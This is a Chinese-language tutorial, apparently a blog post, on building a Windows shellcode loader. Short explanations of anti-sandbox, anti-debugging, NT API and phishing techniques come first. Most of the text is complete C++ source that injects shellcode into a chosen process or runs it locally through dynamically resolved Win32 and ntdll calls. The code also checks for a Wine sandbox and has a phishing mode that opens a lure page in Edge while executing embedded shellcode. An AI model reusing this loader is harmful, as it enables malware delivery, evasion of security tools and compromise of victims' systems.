一、反沙箱、反虚拟机
概念:
指绕过或逃避沙箱环境和虚拟机的安全措施,以执行恶意代码或进行攻击。攻击者可能会尝试识别和规避这些安全层,以便在目标系统上运行恶意软件或进行其他恶意活动。反沙箱和反虚拟机技术通常用于逃避安全检测和分析。
实现方式:
检测虚拟化环境的特定特征,如检查虚拟化软件的进程、设备、文件系统或注册表的存在,以确定是否在虚拟机中运行。攻击者还可能检测虚拟化环境的性能特征,如CPU指令集、内存大小或网络配置等。通过识别这些特征,攻击者可以采取措施绕过沙箱或虚拟机的保护,从而执行恶意代码或进行攻击。
二、反调试
概念:
指用于防止恶意软件被调试和分析的技术。
实现方式:
检测调试器的存在、监视调试器的行为、修改调试器的行为或绕过调试器的检测等方法。攻击者利用这些技术来阻止安全研究人员或安全工具对恶意软件进行调试和分析,从而增加恶意软件的隐蔽性和持久性。
三、NT函数
概念:
NT函数是Windows操作系统内核中的一种函数类型,用于执行各种系统级任务,如管理进程、文件系统、内存和设备等。这些函数提供了操作系统核心功能的接口,允许应用程序与操作系统进行交互和通信。
实现方式:
通过Windows内核模块中的函数来实现,这些函数由微软开发并包含在操作系统内核中。应用程序可以通过系统调用或内核模式驱动程序来调用这些NT函数,以访问操作系统的核心功能和服务。NT函数的实现方式通常是通过调用内核模块中的函数来执行特定的系统级任务,以实现操作系统的各种功能
四、Link钓鱼
概念:
Link钓鱼是一种网络钓鱼攻击技术,通过在电子邮件、社交媒体或其他通信渠道中发送虚假链接,诱使用户点击并访问恶意网站或下载恶意软件。
实现方式:
攻击者通常会伪装成信任的实体或组织,诱使受害者点击链接并泄露个人信息、凭据或感染其设备。 Link钓鱼的实现方式包括创建看似真实的电子邮件、社交媒体帖子或广告,其中包含引诱受害者点击的链接。链接可能会指向伪装成合法网站的恶意网站,用于窃取信息或植入恶意软件。攻击者还可能利用社会工程技术,诱使受害者相信链接的真实性,从而增加点击率。要防范Link钓鱼攻击,用户应警惕未知来源的链接,避免点击可疑链接,并确保设备和软件保持最新的安全更新。
五、回调函数
概念:
回调函数是一种在编程中常见的概念,它是指将一个函数作为参数传递给另一个函数,以便在特定事件发生时调用该函数。回调函数通常用于异步编程或事件驱动编程中,用于处理异步操作的完成或特定事件的发生。
实现方式:
回调函数的实现方式是将函数的指针或引用传递给另一个函数,并在需要时由该函数调用。当满足特定条件或事件发生时,调用方会调用回调函数来执行特定的操作或逻辑。回调函数的灵活性使其在许多编程语言和框架中被广泛应用,用于处理各种情况下的回调逻辑。
六、实例
源文件:
#include "myFunc.h"
#include<string>
wchar_t* AtoW(char** a) {
setlocale(LC_ALL, "");
// 原始的char*字符串
char* char_str = *a;
// 确定所需的wchar_t缓冲区的大小
size_t wchar_size = mbstowcs(NULL, char_str, 0) + 1;
if (wchar_size == (size_t)-1) {
perror("mbstowcs");
return 0;
}
// 分配wchar_t缓冲区
wchar_t* wchar_str = (wchar_t*)malloc(wchar_size * sizeof(wchar_t));
if (wchar_str == NULL) {
perror("malloc");
return 0;
}
// 执行转换
mbstowcs(wchar_str, char_str, wchar_size);
return wchar_str;
}
//读取shellcode
char* ReadFile(SIZE_T* length, char* file) {
char* filename = file;
ifstream infile;
infile.open(filename, ios::out | ios::binary);
infile.seekg(0, infile.end);
*length = infile.tellg();
infile.seekg(0, infile.beg);
char* data = new char[*length];
if (infile.is_open()) {
cout << "reading from the file" << endl;
infile.read(data, *length);
}
return data;
}
//注入进程
void Inject(char* argv[]) {
SIZE_T length = 0;
char* data;
data = ReadFile(&length, argv[2]);
HANDLE snapshot_handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //快照(留像)
if (snapshot_handle != INVALID_HANDLE_VALUE) {
// 枚举进程
PROCESSENTRY32 process_entry;
process_entry.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(snapshot_handle, &process_entry)) {
do {
// 将进程名转换为宽字符串
std::wstring extFileName(process_entry.szExeFile);
wchar_t* exename = AtoW(&argv[3]);
// 如果进程名包含 "msedge.exe" 则进行以下操作 std::string::npos == 当初遍历的进程名
if (extFileName.find(exename) != std::string::npos) {
// 打开进程
fn_OpenProcess myOpenProcess = (fn_OpenProcess)GetProcAddress(LoadLibraryA("kernel32.dll"), "OpenProcess");
HANDLE process_handle = myOpenProcess(PROCESS_ALL_ACCESS, FALSE, process_entry.th32ProcessID);
if (process_handle != NULL) {
// 在远程进程中分配内存
fn_VirtualAllocEx myVirtualAllocEx = (fn_VirtualAllocEx)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAllocEx");
LPVOID remote_buffer = myVirtualAllocEx(process_handle, NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (remote_buffer != NULL) {
SIZE_T bytes_written;
// 将 code 写入远程进程内存
if (WriteProcessMemory(process_handle, remote_buffer, data, length, &bytes_written)) {
std::cout << "Remote buffer address: " << remote_buffer << std::endl;
// 在远程进程中创建线程执行 code
HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);
if (remote_thread != NULL) {
// 等待线程结束
WaitForSingleObject(remote_thread, INFINITE);
CloseHandle(remote_thread);
}
}
// 关闭远程内存句柄
CloseHandle(remote_buffer);
}
// 关闭进程句柄
CloseHandle(process_handle);
}
}
} while (Process32Next(snapshot_handle, &process_entry)); // 继续枚举下一个进程
}
// 关闭进程快照句柄
CloseHandle(snapshot_handle);
}
}
//读取文件正常上线
VOID Normal(char* file) {
SIZE_T length = 0;
char* data = NULL;
data = ReadFile(&length, file);
fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");
LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);
memcpy(shell_addr, data, length);
HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);
WaitForSingleObject(HThread, -1);
}
//直接到缓存区上线
void Direct() {
size_t length;
unsigned char* data = assemble_data(&length);
fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");
LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);
memcpy(shell_addr, data, length);
HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);
WaitForSingleObject(HThread, -1);
}
void NtCall(char* file) {
SIZE_T length = 0;
char* data = NULL;
data = ReadFile(&length, file);
fn_NtAllocateVirtualMemory myNtAllocateVirtualMemory = (fn_NtAllocateVirtualMemory)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtAllocateVirtualMemory");
fn_NtCreateThreadEx myNtCreateThreadEx = (fn_NtCreateThreadEx)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx");
HANDLE hRemoteThread = NULL;
HANDLE process = GetCurrentProcess();
LPVOID shell_addr = NULL;
myNtAllocateVirtualMemory(GetCurrentProcess(),&shell_addr, 0,(PULONG)&length, 0x00001000, 0x40);
memcpy(shell_addr, data, length);
myNtCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, process, (LPTHREAD_START_ROUTINE)shell_addr, NULL, 0, 0, 0, 0, 0);
WaitForSingleObject(hRemoteThread, -1);
}
//反杀箱,反虚拟机
void CheckSandBox() {
//vbox_network_share();
Check_MulDiv_1();
Check_MulDiv_2();
}
void Fish(char web[]) {
char command[512] ="\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\""; // 确保缓冲区足够大以容纳完整命令
strcat(command, web);
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
CreateProcessA(NULL,
command,
0,
0,
FALSE,
0,
NULL,
NULL,
&si,
&pi
);
Direct();
}
int main(int argc, char* argv[]) {
if (argc > 1) {
if (strcmp(argv[1], "-i") == 0) {
if (argc == 4) {
printf("Injecting!!!\n");
Inject(argv);
}
else {
printf("注入方式:-i 路径 进程名\n");
}
}
if (strcmp(argv[1], "-d") == 0) {
Normal(argv[2]);
};
if (strcmp(argv[1], "-h") == 0) {
printf("-i Inject\n-h help\n-d normal\n");
}
if (strcmp(argv[1], "-s") == 0) {
CheckSandBox();
}
if (strcmp(argv[1], "-n") == 0) {
if (argc != 3) {
printf("需要Shellcode路径\n");
}
NtCall(argv[2]);
}
if (strcmp(argv[1], "-g") == 0) {
char web[50];
printf("Input Web:");
scanf("%s", &web);
Fish(web);
}
}
if (argc == 1) {
Direct();
}
return 0;
}
头文件:
SandBox.h
#pragma once
#include"myFunc.h"
int Check_MulDiv_1() {
// Call MulDiv with specific arguments
int result = MulDiv(1, 0x80000000, 0x80000000);
// Check if the result matches the expected value
if (result != 2) {
std::cout << "MulDiv evasion method detected: Wine environment." << std::endl;
}
else {
std::cout << "MulDiv evasion method not detected." << std::endl;
}
return 0;
}
int Check_MulDiv_2() {
// Check for the existence of Wine's exclusive APIs
HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
FARPROC wineGetUnixFileName = GetProcAddress(hKernel32, "wine_get_unix_file_name");
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
FARPROC wineGetHostVersion = GetProcAddress(hNtdll, "wine_get_host_version");
if (wineGetUnixFileName || wineGetHostVersion) {
std::cout << "Wine's exclusive APIs detected: Wine environment." << std::endl;
}
else {
std::cout << "Wine's exclusive APIs not detected." << std::endl;
}
return 0;
}
MyFunc.h
#pragma once
#include<Windows.h>
#include <tlhelp32.h>
#include <fstream>
#include<iostream>
#include"data.h"
#include"SandBox.h"
using namespace std;
typedef LPVOID(WINAPI* fn_VirtualAllocEx)(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef HANDLE(WINAPI* fn_OpenProcess)(
_In_ DWORD dwDesiredAccess,
_In_ BOOL bInheritHandle,
_In_ DWORD dwProcessId
);
typedef LPVOID(WINAPI* fn_VirtualAlloc)(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
typedef HANDLE (WINAPI* fn_CreateThread)(
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ SIZE_T dwStackSize,
_In_ LPTHREAD_START_ROUTINE lpStartAddress,
_In_opt_ __drv_aliasesMem LPVOID lpParameter,
_In_ DWORD dwCreationFlags,
_Out_opt_ LPDWORD lpThreadId
);
typedef NTSTATUS (NTAPI* fn_NtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG ZeroBits,
PULONG RegionSize,
ULONG AllocationType,
ULONG Protect);
typedef DWORD(NTAPI* fn_NtCreateThreadEx)(
PHANDLE ThreadHandle, //指向线程句柄的指针
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle, //进程句柄
LPTHREAD_START_ROUTINE lpstartAddress, //要执行的函数
LPVOID lpParameter, //函数的参数
ULONG CreateThreadFlags,
SIZE_T ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
LPVOID pUnknow
);